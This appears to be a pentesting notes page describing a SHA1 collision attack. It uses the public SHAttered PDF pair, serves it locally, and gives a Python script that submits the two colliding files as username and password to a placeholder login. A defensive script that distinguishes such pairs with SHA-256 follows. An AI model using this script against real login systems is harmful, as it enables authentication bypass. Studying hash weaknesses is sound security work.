# SHA1 Hash Collision Attack

### Sample Attacks <a href="#sample-attacks" id="sample-attacks"></a>

#### 1. Download two Files <a href="#id-1-download-two-files" id="id-1-download-two-files"></a>

Colliding files are available from several sources, so choose the pair that suits your purpose.

* Download the two original PDF files from [SHAttered](https://shattered.io/).
* Download two custom files (e.g. messageA and messageB) from [Chosen-Prefix Collision Example](https://sha-mbles.github.io/).

Check that the two files in each pair have the same SHA1 hash.

```shellscript
sha1sum shattered-1.pdf
sha1sum shattered-2.pdf

sha1sum messageA
sha1sum messageB
```

#### 2. Host the PDF Files Locally <a href="#id-2-host-the-pdf-files-locally" id="id-2-host-the-pdf-files-locally"></a>

In the directory where the two PDF files are located, start a local web server so that the Python script can fetch them.

```shellscript
python3 -m http.server 8000
```

#### 3. Create a Python Script <a href="#id-3-create-a-python-script" id="id-3-create-a-python-script"></a>

For example, create `test.py`.

```python
import requests

file1 = "shattered-1.pdf"
file2 = "shattered-2.pdf"

# Fetch both files from the local server started in step 2.
pdf_1 = requests.get(f'http://localhost:8000/{file1}')
pdf_2 = requests.get(f'http://localhost:8000/{file2}')

# e.g. the two values can be used as username/password:
# their raw bytes differ, but their SHA1 hashes are the same.
params = {'username': pdf_1.content, 'password': pdf_2.content}
r = requests.get('https://example.com/login', params=params)
print(r.text)
```

#### 4. Run the Script <a href="#id-4-run-the-script" id="id-4-run-the-script"></a>

```shellscript
python3 test.py
```
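
To complement the `sha1sum` check in step 1, the following added example (not part of the original page) classifies a pair of inputs by content, SHA1 digest and SHA-256 digest, which shows that a stronger hash tells a colliding pair apart. The names `classify_pair`, `toy_hash` and `find_toy_collision` are hypothetical; `toy_hash` is a constructed 8-bit truncation of SHA1, used only so the collision branch can run offline without the downloaded files.

```python
import hashlib
import hmac
import sys
from pathlib import Path


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def classify_pair(a: bytes, b: bytes, weak=sha1, strong=sha256) -> str:
    """Compare two inputs by content, by the weak digest and by the strong digest."""
    if a == b:
        return "identical"
    weak_match = hmac.compare_digest(weak(a), weak(b))
    strong_match = hmac.compare_digest(strong(a), strong(b))
    if weak_match:
        # Different bytes but the same weak digest: the weak hash cannot tell them apart.
        return "collision-both" if strong_match else "collision"
    return "distinct"


def toy_hash(data: bytes) -> bytes:
    """Constructed stand-in: SHA1 truncated to 8 bits, so collisions are trivial."""
    return sha1(data)[:1]


def find_toy_collision() -> tuple[bytes, bytes]:
    """Pigeonhole: 257 distinct inputs must repeat one of the 256 toy digests."""
    seen = {}
    for i in range(257):
        msg = b"sample-%d" % i  # constructed sample input
        d = toy_hash(msg)
        if d in seen:
            return seen[d], msg
        seen[d] = msg
    raise AssertionError("unreachable")


if __name__ == "__main__":
    if len(sys.argv) == 3:  # two file paths, e.g. the pair from step 1
        a, b = (Path(p).read_bytes() for p in sys.argv[1:3])
        print(classify_pair(a, b))
    else:  # offline demo with the constructed toy hash
        a, b = find_toy_collision()
        print(a, b, classify_pair(a, b, weak=toy_hash))
```

Given two file paths, the script reports `collision` when the bytes differ, the SHA1 digests match and the SHA-256 digests do not.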

### References <a href="#references" id="references"></a>

* [Shattered](https://shattered.io/)
* [sha-mbles](https://sha-mbles.github.io/)
